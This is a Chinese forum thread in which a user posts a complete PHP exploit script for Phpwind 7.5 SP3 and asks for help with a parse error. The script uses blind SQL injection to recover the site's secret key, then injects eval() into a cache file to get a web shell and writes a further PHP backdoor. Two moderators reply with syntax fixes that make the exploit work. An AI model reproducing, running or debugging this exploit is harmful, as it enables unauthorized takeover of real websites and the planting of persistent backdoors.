| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 2231 人关注过本帖
标题:php代码报错。
只看楼主 加入收藏
shenyun345
Rank: 2
等 级:论坛游民
帖 子:32
专家分:10
注 册:2009-7-13
结帖率:50%
收藏
已结贴  问题点数:0 回复次数:4 
php代码报错。
<?php
error_reporting(0);
set_time_limit(0);
echo "
Info: Poc for Phpwind 7.5 SP3
Test: exp.php user password http://www.

";


if($argc<3){
    echo "\r\nexploit.php user password http://www.\r\n";
    die();
}
$user=$argv[1];
$pass=$argv[2];
$pwurl=$argv[3];
$myheader=array(
        'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language: zh-cn,zh;q=0.5',
        'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
        'Referer: http://www.',
        'Connection: Keep-Alive',
        'Cache-Control: no-cache',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
    );
$cookie="";
$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2Flocalhost%2Fuploadc&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);
preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);
for($i=0;$i<count($array[1]);$i++){
    $cookie=$cookie.";".$array[1][$i];
}
//echo $cookie;
$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);
if(strpos($test,'<ajax>')) {
    die('用户密码或者其他参数错误');
}

$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e%23";
$hash="0123456789abcdef";
$craked="";
for($i=0;$i<32;$i++){
    for($n=0;$n<16;$n++){
        $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode);
        $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);
        if(strpos($tmp,"pw_config")){
            echo ">";
            $craked=$craked.$hash[$n];
            break;
        }
    }
}
if($craked=="") die("exploit failed\n");
echo "\nCraked Magicdata :".$craked."\r\n";
echo "Get shell :";

$arg='';
$hack = array();
$hack['mode'] = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_REQUEST[c]).\'abc";}}}';
$hack['type'] = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}
$arg.='sig='.md5($arg.$craked);
echo "OK\r\n";
$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if(strpos($str,'wooyun')){
    echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen("xia.php","w"),"<?eval(\$_POST[xia]);?>")?>;";
    echo "\r\nOver!";
}
function strips($param) {
    if (is_array($param)) {
        foreach ($param as $key => $value) {
            $param[$key] = strips($value);
        }
    } else {
        $param = stripslashes($param);
    }
    return $param;
}

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){
global $cookie;
$ch = curl_init();
$timeout = 0; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_POST, $method);
curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
if($data){
curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
}
curl_setopt ($ch, CURLOPT_HEADER, $header);
if($ssl){
    curl_setopt($ch,  CURLOPT_SSL_VERIFYPEER,  FALSE);
}
$handles = curl_exec($ch);
curl_close($ch);
return $handles;
}

这段代码在php环境中运行会爆错
Parse error: syntax error, unexpected T_STRING, expecting ',' or ';'
大牛帮忙看看改改
搜索更多相关主题的帖子: 代码 php 
2010-09-06 22:08
shenyun345
Rank: 2
等 级:论坛游民
帖 子:32
专家分:10
注 册:2009-7-13
收藏
得分:0 
显示是第98行有错误,大家帮帮看看
错误回显就是
Parse error: syntax error, unexpected T_STRING, expecting ',' or ';'
2010-09-06 22:09
asmdaydream
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:中原
等 级:版主
威 望:13
帖 子:257
专家分:840
注 册:2009-5-10
收藏
得分:10 
第75行,貌似就有问题了
if(strpos($str,'wooyun')){
    echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen("xia.php","w"),"<?eval(\$_POST[xia]);?>")?>;";
    echo "\r\nOver!";
}

=<?fputs(fopen("xia.php","w")         " 这个符号应该要价格反斜杠转义吧

常走夜路不怕黑 长沙PHP高薪招聘群6K+ 95926136
2010-09-07 00:08
gupiao175
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
等 级:版主
威 望:40
帖 子:1787
专家分:7527
注 册:2007-6-27
收藏
得分:10 
echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen("xia.php","w"),"<?eval(\$_POST[xia]);?>")?>;";
改为这样试试:
echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen('xia.php','w');eval('$_POST[xia]');?>"

Q:1428196631,百度:开发地 即可找到我,有事请留言!
2010-09-07 01:39
快速回复:php代码报错。
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.021723 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved